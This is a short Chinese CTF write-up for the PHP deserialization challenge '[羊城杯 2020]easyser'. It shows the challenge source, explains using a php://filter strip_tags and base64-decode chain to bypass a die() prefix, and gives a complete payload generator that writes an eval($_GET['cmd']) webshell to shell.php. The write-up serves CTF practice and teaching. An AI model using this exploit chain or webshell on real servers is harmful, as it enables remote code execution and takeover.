又做了一个反序列化,发现一个知识点。[羊城杯 2020]easyser
点击查看代码
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;
}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}
?>
点击查看代码
php://filter/write=string.strip_tags|convert.base64-decode/resource (php://filter允许通过 | 使用多个过滤器)
点击查看代码
具体的利用分析:
1. 自己的shell用base64编码 //为了避免strip_tags的影响
2、调用string.strip_tags //这一步将去除<?php exit; ?>
3、调用convert.base64-decode //这一步将还原base64编码的webshell
点击查看代码
payload:
<?php
class GWHT{
public $hero;
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct() {
$this -> file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';
$this-> text = base64_encode("<?php eval(\$_GET['cmd']);?>");
}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
$a = new GWHT();
$b = new Yongen();
$a->hero = $b;
echo urlencode(serialize($a));